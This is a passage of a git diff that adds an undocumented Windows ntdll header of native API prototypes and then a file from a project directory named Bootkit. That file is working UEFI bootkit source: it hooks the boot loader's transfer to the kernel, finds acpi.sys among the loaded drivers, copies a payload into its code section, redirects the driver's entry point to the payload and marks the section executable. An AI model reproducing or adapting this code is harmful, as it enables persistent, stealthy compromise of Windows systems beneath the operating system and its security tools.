NotificationFunction, + IN PVOID Context, + OUT PVOID *Cookie + ); + +NTSTATUS +NTAPI +LdrUnregisterDllNotification( + IN PVOID Cookie + ); + +ULONG +NTAPI +CsrGetProcessId( + ); + +void +NTAPI +A_SHAFinal( + PSHA_CTX Context, + PULONG Result + ); + + +PVOID +NTAPI +A_SHAUpdate( + IN OUT PSHA_CTX, + IN PCHAR, + IN UINT + ); + +PVOID +NTAPI +A_SHAInit( + IN OUT PSHA_CTX, + OUT PVOID + ); + +BOOLEAN +NTAPI +RtlDosPathNameToNtPathName_U( + IN PCWSTR DosFileName, + OUT PUNICODE_STRING NtFileName, + OUT PWSTR *FilePart OPTIONAL, + PVOID Reserved + ); + +NTSTATUS +NTAPI +RtlDosPathNameToNtPathName_U_WithStatus( + IN PCWSTR DosFileName, + OUT PUNICODE_STRING NtFileName, + OUT PWSTR *FilePart OPTIONAL, + PVOID Reserved // Must be NULL + ); + +PVOID +NTAPI +RtlAddVectoredExceptionHandler ( + IN ULONG First, + IN PVECTORED_EXCEPTION_HANDLER Handler + ); + +PVOID +NTAPI +RtlAddVectoredContinueHandler ( + IN ULONG First, + IN PVECTORED_EXCEPTION_HANDLER Handler + ); + +NTSTATUS +NTAPI +RtlAnalyzeProfile ( + VOID + ); + +BOOLEAN +NTAPI +RtlCallVectoredContinueHandlers ( + IN PEXCEPTION_RECORD ExceptionRecord, + IN PCONTEXT ContextRecord + ); + +PVOID +RtlEncodePointer( + PVOID Ptr + ); + +PVOID +RtlDecodePointer( + PVOID Ptr + ); + +PVOID +RtlEncodeSystemPointer( + PVOID Ptr + ); + +PVOID +RtlDecodeSystemPointer( + PVOID Ptr + ); + +VOID +NTAPI +RtlDeleteResource( + PRTL_RESOURCE Resource + ); + +NTSTATUS +NTAPI +RtlDeleteSecurityObject( + PSECURITY_DESCRIPTOR * ObjectDescriptor + ); + +BOOLEAN +RtlDllShutdownInProgress( + VOID + ); + +ULONG +NTAPI +RtlGetCurrentProcessorNumber ( + VOID + ); + +#define RTL_UNLOAD_EVENT_TRACE_NUMBER 16 + +typedef struct _RTL_UNLOAD_EVENT_TRACE { + PVOID BaseAddress; // Base address of dll + SIZE_T SizeOfImage; // Size of image + ULONG Sequence; // Sequence number for this event + ULONG TimeDateStamp; // Time and date of image + ULONG CheckSum; // Image checksum + WCHAR ImageName[32]; // Image name +} RTL_UNLOAD_EVENT_TRACE, *PRTL_UNLOAD_EVENT_TRACE; + +typedef struct _RTL_UNLOAD_EVENT_TRACE64 { + ULONGLONG BaseAddress; // Base address of dll + ULONGLONG SizeOfImage; // Size of image + ULONG Sequence; // Sequence number for this event + ULONG TimeDateStamp; // Time and date of image + ULONG CheckSum; // Image checksum + WCHAR ImageName[32]; // Image name +} RTL_UNLOAD_EVENT_TRACE64, *PRTL_UNLOAD_EVENT_TRACE64; + +typedef struct _RTL_UNLOAD_EVENT_TRACE32 { + ULONG BaseAddress; // Base address of dll + ULONG SizeOfImage; // Size of image + ULONG Sequence; // Sequence number for this event + ULONG TimeDateStamp; // Time and date of image + ULONG CheckSum; // Image checksum + WCHAR ImageName[32]; // Image name +} RTL_UNLOAD_EVENT_TRACE32, *PRTL_UNLOAD_EVENT_TRACE32; + +PRTL_UNLOAD_EVENT_TRACE +NTAPI +RtlGetUnloadEventTrace( + VOID + ); + +NTSTATUS +NTAPI +RtlInitializeProfile( + BOOLEAN KernelToo + ); + +typedef BOOLEAN +(NTAPI * +PRTL_IS_THREAD_WITHIN_LOADER_CALLOUT)( + VOID + ); + +BOOLEAN +NTAPI +RtlIsThreadWithinLoaderCallout ( + VOID + ); + +NTSTATUS +NTAPI +RtlSetLFHDebuggingInformation( + PVOID LFHHeap, + PHEAP_DEBUGGING_INFORMATION DebuggingInformation + ); + +ULONG +NTAPI +RtlMultipleAllocateHeap ( + IN PVOID HeapHandle, + IN ULONG Flags, + IN SIZE_T Size, + IN ULONG Count, + OUT PVOID * Array + ); + +ULONG +NTAPI +RtlMultipleFreeHeap ( + IN PVOID HeapHandle, + IN ULONG Flags, + IN ULONG Count, + OUT PVOID * Array + ); + +NTSTATUS +NTAPI +RtlNewSecurityObjectEx ( + IN PSECURITY_DESCRIPTOR ParentDescriptor OPTIONAL, + IN PSECURITY_DESCRIPTOR CreatorDescriptor OPTIONAL, + OUT PSECURITY_DESCRIPTOR * NewDescriptor, + IN GUID *ObjectType OPTIONAL, + IN BOOLEAN IsDirectoryObject, + IN ULONG AutoInheritFlags, + IN HANDLE Token, + IN PGENERIC_MAPPING GenericMapping + ); + +NTSTATUS +NTAPI +RtlNewSecurityObjectWithMultipleInheritance ( + IN PSECURITY_DESCRIPTOR ParentDescriptor OPTIONAL, + IN PSECURITY_DESCRIPTOR CreatorDescriptor OPTIONAL, + OUT PSECURITY_DESCRIPTOR * NewDescriptor, + IN GUID **pObjectType OPTIONAL, + IN ULONG GuidCount, + IN BOOLEAN IsDirectoryObject, + IN ULONG AutoInheritFlags, + IN HANDLE Token, + IN PGENERIC_MAPPING GenericMapping + ); + +#if !defined(_WINDOWS_) +NTSTATUS +NTAPI +RtlSetHeapInformation ( + IN PVOID HeapHandle, + IN HEAP_INFORMATION_CLASS HeapInformationClass, + IN PVOID HeapInformation OPTIONAL, + IN SIZE_T HeapInformationLength OPTIONAL + ); + +NTSTATUS +NTAPI +RtlQueryHeapInformation ( + IN PVOID HeapHandle, + IN HEAP_INFORMATION_CLASS HeapInformationClass, + OUT PVOID HeapInformation OPTIONAL, + IN SIZE_T HeapInformationLength OPTIONAL, + OUT PSIZE_T ReturnLength OPTIONAL + ); +#endif + +NTSTATUS +NTAPI +RtlQuerySecurityObject ( + PSECURITY_DESCRIPTOR ObjectDescriptor, + SECURITY_INFORMATION SecurityInformation, + PSECURITY_DESCRIPTOR ResultantDescriptor, + ULONG DescriptorLength, + PULONG ReturnLength + ); + +NTSTATUS +NTAPI +RtlRegisterWait( + OUT PHANDLE WaitHandle, + IN HANDLE Handle, + IN WAITORTIMERCALLBACKFUNC Function, + IN PVOID Context, + IN ULONG Milliseconds, + IN ULONG Flags + ); + +ULONG +NTAPI +RtlRemoveVectoredContinueHandler ( + IN PVOID Handle + ); + +ULONG +NTAPI +RtlRemoveVectoredExceptionHandler ( + IN PVOID Handle + ); + +NTSTATUS +NTAPI +RtlSetIoCompletionCallback( + IN HANDLE FileHandle, + IN APC_CALLBACK_FUNCTION CompletionProc, + IN ULONG Flags + ); + +NTSTATUS +NTAPI +RtlSetSecurityObject( + SECURITY_INFORMATION SecurityInformation, + PSECURITY_DESCRIPTOR ModificationDescriptor, + PSECURITY_DESCRIPTOR *ObjectsSecurityDescriptor, + PGENERIC_MAPPING GenericMapping, + HANDLE Token + ); + +NTSTATUS +NTAPI +RtlSetSecurityObjectEx( + IN SECURITY_INFORMATION SecurityInformation, + IN PSECURITY_DESCRIPTOR ModificationDescriptor, + IN OUT PSECURITY_DESCRIPTOR *ObjectsSecurityDescriptor, + IN ULONG AutoInheritFlags, + IN PGENERIC_MAPPING GenericMapping, + IN HANDLE Token OPTIONAL + ); + +typedef ULONG (NTAPI RTLP_UNHANDLED_EXCEPTION_FILTER) ( + struct _EXCEPTION_POINTERS *ExceptionInfo + ); + +typedef RTLP_UNHANDLED_EXCEPTION_FILTER *PRTLP_UNHANDLED_EXCEPTION_FILTER; + +VOID +RtlSetUnhandledExceptionFilter ( + PRTLP_UNHANDLED_EXCEPTION_FILTER UnhandledExceptionFilter + ); + +NTSTATUS +NTAPI +RtlStartProfile ( + VOID + ); + +NTSTATUS +NTAPI +RtlStopProfile ( + VOID + ); + +NTSTATUS +RtlWow64EnableFsRedirection( + IN BOOLEAN Wow64FsEnableRedirection + ); + + +NTSTATUS +RtlWow64EnableFsRedirectionEx( + IN PVOID Wow64FsEnableRedirection, + OUT PVOID *OldFsRedirectionLevel + ); + +NTSTATUS +NTAPI +RtlRegisterWait( + OUT PHANDLE WaitHandle, + IN HANDLE Handle, + IN WAITORTIMERCALLBACKFUNC Function, + IN PVOID Context, + IN ULONG Milliseconds, + IN ULONG Flags + ); + +NTSTATUS +NTAPI +RtlDeregisterWait( + IN HANDLE WaitHandle + ); + +NTSTATUS +NTAPI +RtlDeregisterWaitEx( + IN HANDLE WaitHandle, + IN HANDLE Event + ); + +#define RtlEqualMemory(Destination,Source,Length) (!memcmp((Destination),(Source),(Length))) +#define RtlMoveMemory(Destination,Source,Length) memmove((Destination),(Source),(Length)) +#define RtlCopyMemory(Destination,Source,Length) memcpy((Destination),(Source),(Length)) +#define RtlFillMemory(Destination,Length,Fill) memset((Destination),(Fill),(Length)) +#define RtlZeroMemory(Destination,Length) memset((Destination),0,(Length)) + +typedef +VOID +(*PKNORMAL_ROUTINE) +(IN PVOID NormalContext, + IN PVOID SystemArgument1, + IN PVOID SystemArgument2 + ); + +VOID +KiUserCallbackDispatcher( + IN ULONG ApiNumber, + IN PVOID InputBuffer, + IN ULONG INputLength + ); + +NTSTATUS +NTAPI +CsrClientConnectToServer( + IN PWSTR ObjectDirectory, + IN ULONG ServertDllIndex, + IN PCSR_CALLBACK_INFO CallbackInformation OPTIONAL, + IN PVOID ConnectionInformation, + IN OUT PULONG ConnectionInformationLength OPTIONAL, + OUT PBOOLEAN CalledFromServer OPTIONAL + ); + + +NTSTATUS +NTAPI +CsrClientCallServer( + IN OUT PCSR_API_MSG m, + IN OUT PCSR_CAPTURE_HEADER CaptureBuffer OPTIONAL, + IN CSR_API_NUMBER ApiNumber, + IN ULONG ArgLength + ); + + +PCSR_CAPTURE_HEADER +NTAPI +CsrAllocateCaptureBuffer( + IN ULONG CountMessagePointers, + IN ULONG CountCapturePointers, + IN ULONG Size + ); + +VOID +NTAPI +CsrFreeCaptureBuffer( + IN PCSR_CAPTURE_HEADER CaptureBuffer + ); + + +ULONG +NTAPI +CsrAllocateMessagePointer( + IN OUT PCSR_CAPTURE_HEADER CaptureBuffer, + IN ULONG Length, + OUT PVOID *Pointer + ); + +VOID +NTAPI +CsrCaptureMessageBuffer( + IN OUT PCSR_CAPTURE_HEADER CaptureBuffer, + IN PVOID Buffer OPTIONAL, + IN ULONG Length, + OUT PVOID *CapturedBuffer + ); + +VOID +NTAPI +CsrCaptureMessageString( + IN OUT PCSR_CAPTURE_HEADER CaptureBuffer, + IN PCSTR String, + IN ULONG Length, + IN ULONG MaximumLength, + OUT PSTRING CapturedString + ); + +PLARGE_INTEGER +NTAPI +CsrCaptureTimeout( + IN ULONG Milliseconds, + OUT PLARGE_INTEGER Timeout + ); + +VOID +NTAPI +CsrProbeForWrite( + IN PVOID Address, + IN ULONG Length, + IN ULONG Alignment + ); + +VOID +NTAPI +CsrProbeForRead( + IN PVOID Address, + IN ULONG Length, + IN ULONG Alignment + ); + +NTSTATUS +NTAPI +CsrNewThread( + VOID + ); + +NTSTATUS +NTAPI +CsrIdentifyAlertableThread( + VOID + ); + +NTSTATUS +NTAPI +CsrSetPriorityClass( + IN HANDLE ProcessHandle, + IN OUT PULONG PriorityClass + ); + +//added 20/03/2011 +NTSTATUS +NTAPI +RtlCreateProcessReflection( + IN HANDLE ProcessHandle, + IN ULONG Flags, + IN OPTIONAL PVOID StartRoutine, + IN OPTIONAL PVOID StartContext, + IN OPTIONAL HANDLE EventHandle, + OUT OPTIONAL PRTL_PROCESS_REFLECTION_INFORMATION ReflectionInformation + ); + + +NTSTATUS +NTAPI +RtlCloneUserProcess( + IN ULONG ProcessFlags, + IN OPTIONAL PSECURITY_DESCRIPTOR ProcessSecurityDescriptor, + IN OPTIONAL PSECURITY_DESCRIPTOR ThreadSecurityDescriptor, + IN OPTIONAL HANDLE DebugPort, + OUT PRTL_USER_PROCESS_INFORMATION ProcessInformation + ); + + +VOID +NTAPI +LdrShutdownProcess( + ); + +NTSTATUS +NTAPI +RtlQueryProcessModuleInformation( + IN HANDLE hProcess OPTIONAL, + IN ULONG Flags, + IN OUT PRTL_DEBUG_INFORMATION Buffer + ); + +NTSTATUS +NTAPI +RtlQueryProcessBackTraceInformation( + IN OUT PRTL_DEBUG_INFORMATION Buffer + ); + +NTSTATUS +NTAPI +RtlQueryProcessHeapInformation( + IN OUT PRTL_DEBUG_INFORMATION Buffer + ); + +NTSTATUS +NTAPI +RtlQueryProcessLockInformation( + IN OUT PRTL_DEBUG_INFORMATION Buffer + ); + +PRTL_DEBUG_INFORMATION +NTAPI +RtlCreateQueryDebugBuffer( + IN ULONG MaximumCommit OPTIONAL, + IN BOOLEAN UseEventPair + ); + +NTSTATUS +NTAPI +RtlDestroyQueryDebugBuffer( + IN PRTL_DEBUG_INFORMATION Buffer + ); + +NTSTATUS +NTAPI +RtlQueryProcessDebugInformation( + IN HANDLE UniqueProcessId, + IN ULONG Flags, + IN OUT PRTL_DEBUG_INFORMATION Buffer + ); + +NTSTATUS +NTAPI +RtlCreateTimer( + IN HANDLE TimerQueueHandle, + OUT HANDLE *Handle, + IN WAITORTIMERCALLBACKFUNC Function, + IN PVOID Context, + IN ULONG DueTime, + IN ULONG Period, + IN ULONG Flags + ); + +NTSTATUS +NTAPI +RtlUpdateTimer( + IN HANDLE TimerQueueHandle, + IN HANDLE TimerHandle, + IN ULONG DueTime, + IN ULONG Period + ); + +NTSTATUS +NTAPI +RtlDeleteTimer( + IN HANDLE TimerQueueHandle, + IN HANDLE TimerToCancel, + IN HANDLE Event + ); + +NTSTATUS +NTAPI +RtlDeleteTimerQueue( + IN HANDLE TimerQueueHandle + ); + +NTSTATUS +NTAPI +RtlDeleteTimerQueueEx( + IN HANDLE TimerQueueHandle, + IN HANDLE Event + ); + + +BOOLEAN +NTAPI +RtlDoesFileExists_U( + PCWSTR FileName + ); + + +ULONG +RtlGetCurrentDirectory_U( + ULONG nBufferLength, + PWSTR lpBuffer + ); + +NTSTATUS +RtlSetCurrentDirectory_U( + PUNICODE_STRING PathName + ); + + +ULONG +RtlDosSearchPath_U( + IN PWSTR lpPath, + IN PWSTR lpFileName, + IN PWSTR lpExtension OPTIONAL, + IN ULONG nBufferLength, + OUT PWSTR lpBuffer, + OUT PWSTR *lpFilePart + ); + + +void +NTAPI +RtlInitString( + PSTRING DestinationString, + PCSZ SourceString + ); + +ULONG +NTAPI +RtlGetFullPathName_U( + IN PCWSTR lpFileName, + IN ULONG nBufferLength, + OUT PWSTR lpBuffer, + OUT OPTIONAL PWSTR *lpFilePart + ); + +LONG +NTAPI +RtlCompareString( + const STRING * String1, + const STRING * String2, + BOOLEAN CaseInSensitive + ); + + +NTSTATUS +NTAPI +LdrRegisterDllNotification( + IN ULONG Flags, + IN PLDR_DLL_NOTIFICATION_FUNCTION NotificationFunction, + IN PVOID Context, + OUT PVOID *Cookie + ); + + +NTSTATUS +NTAPI +LdrUnregisterDllNotification( + IN PVOID Cookie + ); + + +ULONG +NTAPI +EtwRegisterSecurityProvider(); + +ULONG +NTAPI +EtwWriteUMSecurityEvent( + PCEVENT_DESCRIPTOR EventDescriptor, + USHORT EventProperty, + ULONG UserDataCount, + PEVENT_DATA_DESCRIPTOR UserData); + + +ULONG +NTAPI +EtwEventWriteEndScenario( + REGHANDLE RegHandle, + PCEVENT_DESCRIPTOR EventDescriptor, + ULONG UserDataCount, + PEVENT_DATA_DESCRIPTOR UserData + ); + +ULONG +NTAPI +EtwEventWriteFull( + REGHANDLE RegHandle, + PCEVENT_DESCRIPTOR EventDescriptor, + USHORT EventProperty, + LPCGUID ActivityId, + LPCGUID RelatedActivityId, + ULONG UserDataCount, + PEVENT_DATA_DESCRIPTOR UserData + ); + + +ULONG +NTAPI +EtwEventWriteStartScenario( + REGHANDLE RegHandle, + PCEVENT_DESCRIPTOR EventDescriptor, + ULONG UserDataCount, + PEVENT_DATA_DESCRIPTOR UserData + ); + + +// +// old channel apis, from nt4 +// + +NTSTATUS +NTAPI +NtCreateChannel ( + OUT PHANDLE ChannelHandle, + IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL + ); + +NTSTATUS +NTAPI +NtOpenChannel ( + OUT PHANDLE ChannelHandle, + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + +NTSTATUS +NTAPI +NtListenChannel ( + IN HANDLE ChannelHandle, + OUT PCHANNEL_MESSAGE *Message + ); + +NTSTATUS +NTAPI +NtSendWaitReplyChannel ( + IN HANDLE ChannelHandle, + IN PVOID Text, + IN ULONG Length, + OUT PCHANNEL_MESSAGE *Message + ); + +NTSTATUS +NTAPI +NtReplyWaitSendChannel ( + IN PVOID Text, + IN ULONG Length, + OUT PCHANNEL_MESSAGE *Message + ); + + +ULONG +NTAPI +AlpcUnregisterCompletionListWorkerThread( + PVOID CompletionList + ); + + +void +NTAPI +RtlUpdateClonedCriticalSection( + PRTL_CRITICAL_SECTION CriticalSection + ); + +NTSTATUS +NTAPI +RtlGetFullPathName_UstrEx( + PUNICODE_STRING FileName, + PUNICODE_STRING StaticString, + PUNICODE_STRING DynamicString, + PPUNICODE_STRING StringUsed, + PULONG FilePartPrefixCch, + PUCHAR NameInvalid, + PRTL_PATH_TYPE InputPathType, + PULONG BytesRequired); + +int +NTAPI +LdrInitShimEngineDynamic( + PVOID pShimEngineModule); + +NTSTATUS +NTAPI +NtCreateKey( + OUT PHANDLE KeyHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes, + ULONG TitleIndex, + IN OPTIONAL PUNICODE_STRING Class, + IN ULONG CreateOptions, + OUT OPTIONAL PULONG Disposition + ); + +NTSTATUS +NTAPI +NtSetValueKey( + IN HANDLE KeyHandle, + IN PUNICODE_STRING ValueName, + IN OPTIONAL ULONG TitleIndex, + IN ULONG Type, + IN OPTIONAL PVOID Data, + IN ULONG DataSize + ); + +NTSTATUS +NTAPI +NtDeleteFile ( + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + +NTSTATUS +RtlGetVersion( + OUT PRTL_OSVERSIONINFOW lpVersionInformation + ); + +NTSTATUS +NTAPI +ZwWow64QueryInformationProcess64( + IN HANDLE ProcessHandle, + IN PROCESSINFOCLASS ProcessInformationClass, + OUT PVOID ProcessInformation, + IN ULONG ProcessInformationLength, + OUT OPTIONAL PULONG ReturnLength + ); + + +NTSTATUS +NTAPI +ZwWow64QueryVirtualMemory64( + IN HANDLE ProcessHandle, + IN PVOID BaseAddress, + IN MEMORY_INFORMATION_CLASS MemoryInformationClass, + OUT PVOID MemoryInformation, + IN SIZE_T MemoryInformationLength, + OUT OPTIONAL PSIZE_T ReturnLength + ); + + +NTSTATUS +NTAPI +ZwWow64ReadVirtualMemory64( + IN HANDLE ProcessHandle, + IN OPTIONAL PVOID BaseAddress, + OUT PVOID Buffer, + IN SIZE_T BufferSize, + OUT OPTIONAL PSIZE_T NumberOfBytesRead + ); + + +NTSTATUS +NTAPI +ZwWow64WriteVirtualMemory64( + IN HANDLE ProcessHandle, + IN OPTIONAL PVOID BaseAddress, + IN CONST VOID *Buffer, + IN SIZE_T BufferSize, + OUT OPTIONAL PSIZE_T NumberOfBytesWritten + ); + +void +NTAPI +ZwWow64GetCurrentProcessorNumberEx( + OUT PPROCESSOR_NUMBER ProcNumber +); + +PCSR_CAPTURE_HEADER +NTAPI +ZwWow64CsrAllocateCaptureBuffer( + IN ULONG CountMessagePointers, + IN ULONG CountCapturePointers, + IN ULONG Size + ); + +ULONG +NTAPI +ZwWow64CsrAllocateMessagePointer( + IN OUT PCSR_CAPTURE_HEADER CaptureBuffer, + IN ULONG Length, + OUT PVOID *Pointer + ); + +void +NTAPI +ZwWow64CsrCaptureMessageBuffer( + IN OUT PCSR_CAPTURE_HEADER CaptureBuffer, + IN PVOID Buffer OPTIONAL, + IN ULONG Length, + OUT PVOID *CapturedBuffer + ); + +void +NTAPI +ZwWow64CsrCaptureMessageString( + IN OUT PCSR_CAPTURE_HEADER CaptureBuffer, + IN PCSTR String, + IN ULONG Length, + IN ULONG MaximumLength, + OUT PSTRING CapturedString + ); + +NTSTATUS +NTAPI +ZwWow64CsrClientConnectToServer( + IN PWSTR ObjectDirectory, + IN ULONG ServerDllIndex, + IN PCSR_CALLBACK_INFO CallbackInformation OPTIONAL, + IN PVOID ConnectionInformation, + IN OUT PULONG ConnectionInformationLength OPTIONAL, + OUT PBOOLEAN CalledFromServer OPTIONAL + ); + +void +NTAPI +ZwWow64CsrFreeCaptureBuffer( + IN PCSR_CAPTURE_HEADER CaptureBuffer + ); + +NTSTATUS +NTAPI +ZwWow64CsrIdentifyAlertableThread( + void + ); + +NTSTATUS +NTAPI +ZwWow64DebuggerCall ( + IN ULONG ServiceClass, + IN ULONG Arg1, + IN ULONG Arg2 + ); + +NTSTATUS +NTAPI +RtlCleanUpTEBLangLists( + void + ); + +VOID +KiUserApcDispatcher ( + PVOID NormalContext, + PVOID SystemArgument1, + PVOID SystemArgument2, + PKNORMAL_ROUTINE NormalRoutine + ); + +VOID +KiUserExceptionDispatcher ( + PEXCEPTION_RECORD ExceptionRecord, + PCONTEXT ContextFrame + ); + +NTSTATUS +NTAPI +NtCreateDebugObject( + OUT PHANDLE DebugObjectHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes, + IN ULONG Flags + ); + +NTSTATUS +NTAPI +NtDebugActiveProcess( + IN HANDLE ProcessHandle, + IN HANDLE DebugObjectHandle + ); + +NTSTATUS +NTAPI +NtDebugContinue( + IN HANDLE DebugObjectHandle, + IN PCLIENT_ID ClientId, + IN NTSTATUS ContinueStatus + ); + +NTSTATUS +NTAPI +NtRemoveProcessDebug( + IN HANDLE ProcessHandle, + IN HANDLE DebugObjectHandle + ); + +NTSTATUS +NTAPI +NtSetInformationDebugObject( + IN HANDLE DebugObjectHandle, + IN DEBUGOBJECTINFOCLASS DebugObjectInformationClass, + IN PVOID DebugInformation, + IN ULONG DebugInformationLength, + OUT OPTIONAL PULONG ReturnLength + ); + +NTSTATUS +NTAPI +NtWaitForDebugEvent( + IN HANDLE DebugObjectHandle, + IN BOOLEAN Alertable, + IN OPTIONAL PLARGE_INTEGER Timeout, + OUT PVOID WaitStateChange + ); + +// Debugging UI + +NTSTATUS +NTAPI +DbgUiConnectToDbg( + VOID + ); + +HANDLE +NTAPI +DbgUiGetThreadDebugObject( + VOID + ); + +VOID +NTAPI +DbgUiSetThreadDebugObject( + IN HANDLE DebugObject + ); + +NTSTATUS +NTAPI +DbgUiWaitStateChange( + OUT PDBGUI_WAIT_STATE_CHANGE StateChange, + IN OPTIONAL PLARGE_INTEGER Timeout + ); + +NTSTATUS +NTAPI +DbgUiContinue( + IN PCLIENT_ID AppClientId, + IN NTSTATUS ContinueStatus + ); + +NTSTATUS +NTAPI +DbgUiStopDebugging( + IN HANDLE Process + ); + +NTSTATUS +NTAPI +DbgUiDebugActiveProcess( + IN HANDLE Process + ); + +VOID +NTAPI +DbgUiRemoteBreakin( + IN PVOID Context + ); + +NTSTATUS +NTAPI +DbgUiIssueRemoteBreakin( + IN HANDLE Process + ); + +VOID +NTAPI +RtlExitUserProcess( + IN NTSTATUS ExitStatus + ); + +NTSTATUS +NTAPI +RtlQueueWorkItem( + IN WORKERCALLBACKFUNC CallbackFunction, + IN OPTIONAL PVOID Context, + IN ULONG Flags + ); + + +NTSTATUS +NTAPI +RtlCreateUserStack( + SIZE_T CommittedStackSize, + SIZE_T MaximumStackSize, + SIZE_T ZeroBits, + ULONG PageSize, + ULONG ReserveAlignment, + PINITIAL_TEB InitialTeb + ); + + +LRESULT +NTAPI +NtdllDefWindowProc_W( + ); + + +LRESULT +NTAPI +NtdllDefWindowProc_A( + ); + + +NTSTATUS +NTAPI +LdrQueryProcessModuleInformation( + PRTL_PROCESS_MODULES ModuleInformation, + ULONG ModuleInformationLength, + PULONG ReturnLength + ); + + +// +// end non-crt prototypes +// + + +// +// nt crt +// +//please do not change swprintf stuff otherwise win32 mode is always trashed +#if !defined(_NO_NTDLL_CRT_) +int __cdecl vsprintf( char *, const char *, va_list ); +int __cdecl _vsnprintf( char *, size_t, const char *, va_list ); +int __cdecl sprintf( char *, const char *, ... ); +int __cdecl _snprintf( char *, size_t, const char *, ... ); +int __cdecl _snwprintf( wchar_t *, size_t, const wchar_t *, ... ); +int __cdecl swprintf( wchar_t *, const wchar_t *, ... ); +int __cdecl sscanf( const char *, const char *, ... ); +int __cdecl _vscwprintf( const wchar_t *, va_list ); +int __cdecl _vsnwprintf( wchar_t *, size_t, const wchar_t *, va_list ); + +//readded 4 jan 2012 +//win64 mode does not need this +//for using this routines ntdllp.lib is required +#if !defined(_M_X64) +IMPORT_FN size_t __cdecl wcslen(const wchar_t *); +IMPORT_FN wchar_t * __cdecl wcscat(wchar_t *dst, const wchar_t *src); +IMPORT_FN int __cdecl wcscmp(const wchar_t *src, const wchar_t *dst); +IMPORT_FN int __cdecl _wcsicmp(const wchar_t *, const wchar_t *); +IMPORT_FN int __cdecl _wcsnicmp(const wchar_t *, const wchar_t *, size_t); +IMPORT_FN wchar_t * __cdecl _wcslwr(wchar_t *); +IMPORT_FN wchar_t * __cdecl _wcsupr(wchar_t *); +IMPORT_FN wchar_t * __cdecl wcschr(const wchar_t *string, wchar_t ch); +IMPORT_FN wchar_t * __cdecl wcscpy(wchar_t *dst, const wchar_t *src); +IMPORT_FN wchar_t * __cdecl wcsncat(wchar_t *front, const wchar_t *back, size_t count); +IMPORT_FN wchar_t * __cdecl wcsncpy(wchar_t *dest, const wchar_t *source, size_t count); +#endif //_M_X64 + +#endif // _NO_NTDLL_CRT_ + +#ifdef __cplusplus +} +#endif + + +#endif /* _NTDLL_ */ diff --git a/src/Bootkit/OslArchTransferToKernel.c b/src/Bootkit/OslArchTransferToKernel.c new file mode 100644 index 0000000..a5f777d --- /dev/null +++ b/src/Bootkit/OslArchTransferToKernel.c @@ -0,0 +1,96 @@ +#include "Common.h" + +typedef struct +{ + ULONG OsMajorVersion; + ULONG OsMinorVersion; + ULONG Length; + ULONG Reserved; + LIST_ENTRY LoadOrderListHead; + LIST_ENTRY MEmoryDescriptorListHead; + LIST_ENTRY BootDriverListHead; +} PARAMETER_BLOCK, *PPARAMETER_BLOCK ; + + +D_SEC( B ) VOID EFIAPI OslArchTransferToKernelHook( _In_ PVOID LoaderBlock, _In_ PVOID Entry ) +{ + SIZE_T Len = 0; + PEFTBL Eft = NULL; + PLIST_ENTRY Hdr = NULL; + PLIST_ENTRY Ent = NULL; + PPARAMETER_BLOCK Blk = NULL; + PIMAGE_DOS_HEADER Ntd = NULL; + PIMAGE_DOS_HEADER Dos = NULL; + PIMAGE_NT_HEADERS Nth = NULL; + PIMAGE_SECTION_HEADER Sec = NULL; + PLDR_DATA_TABLE_ENTRY Ldr = NULL; + + /* Get EfiTable address */ + Eft = C_PTR( G_PTR( EfTbl ) ); + Blk = C_PTR( LoaderBlock ); + + /* Initialize list values */ + Hdr = & Blk->LoadOrderListHead; + Ent = Hdr->Flink; + + /* Enumerate the list to completion */ + while ( C_PTR( Ent ) != C_PTR( Hdr ) ) { + + /* Get the LDR_DATA_TABLE_ENTRY */ + Ldr = CONTAINING_RECORD( Ent, LDR_DATA_TABLE_ENTRY, InLoadOrderLinks ); + + /* Is this acpi.sys? */ + if ( HashString( Ldr->BaseDllName.Buffer, Ldr->BaseDllName.Length ) == 0x5dc8930f ) { + Dos = C_PTR( Ldr->DllBase ); + Nth = C_PTR( U_PTR( Dos ) + Dos->e_lfanew ); + Sec = IMAGE_FIRST_SECTION( Nth ); + + /* Enumerate all the PE Sections */ + for ( INT Idx = 0 ; Idx < Nth->FileHeader.NumberOfSections ; ++Idx ) { + /* Is this a .text section? */ + if ( HashString( & Sec[ Idx ].Name, 0 ) == 0x0b6dca4d ) { + + /* Locate the ntoskrnl image base */ + Ntd = C_PTR( U_PTR( U_PTR( Entry ) &~ ( 0x1000 - 1 ) ) ); + while ( Ntd->e_magic != IMAGE_DOS_SIGNATURE ) { + /* Decrement by a page! */ + Ntd = C_PTR( U_PTR( Ntd ) - 0x1000 ); + }; + + /* Store information for DrvMain to retrieve */ + Eft->KernelBuf = C_PTR( G_PTR( EfiMain ) ); + Eft->KernelLen = U_PTR( ( U_PTR( GetIp() ) + 11 ) - U_PTR( G_PTR( EfiMain ) ) ); + Eft->KernelBase = C_PTR( Ntd ); + Eft->TgtDrvImgSect = C_PTR( & Sec[ Idx ] ); + Eft->TgtDrvImgBase = C_PTR( Ldr->DllBase ); + Eft->TgtDrvLdrEntry = C_PTR( Ldr ); + Eft->TgtDrvAddressOfEntrypoint = Nth->OptionalHeader.AddressOfEntryPoint; + + /* Find the total length of the buffer */ + Len = C_PTR( U_PTR( U_PTR( GetIp() ) + 11 ) - U_PTR( G_PTR( DrvMain ) ) ); + + /* Insert DrvMainStart */ + __builtin_memcpy( C_PTR( U_PTR( Dos ) + Sec[ Idx ].VirtualAddress ), C_PTR( G_PTR( DrvMain ) ), Len ); + + /* Insert a hook! */ + Ldr->EntryPoint = C_PTR( U_PTR( Dos ) + Sec[ Idx ].VirtualAddress ); + Nth->OptionalHeader.AddressOfEntryPoint = C_PTR( U_PTR( Dos ) + Sec[ Idx ].VirtualAddress ); + + /* Set -x permission in section */ + Sec[ Idx ].Characteristics |= IMAGE_SCN_MEM_EXECUTE; + + /* Break! */ + break; + }; + }; + /* Break! */ + break; + }; + + /* Next entry */ + Ent = C_PTR( Ent->Flink ); + }; + + /* Execute original OslArchTransferToKernel stub and callgate */ + ( ( __typeof__( OslArchTransferToKernelHook ) * ) Eft->OslArchTransferToKernelGate )( LoaderBlock, Entry ); +}; diff --git a/src/Bootkit/OslArchTransferToKernel.h b/src/Bootkit/OslArchTransferToKernel.h new file mode 100644 index 0000000..e848f56 --- /dev/null +++ b/src/Bootkit/OslArchTransferToKernel.h @@ -0,0 +1,11 @@ +#pragma once + +/*! + * + * Purpose: + * + * 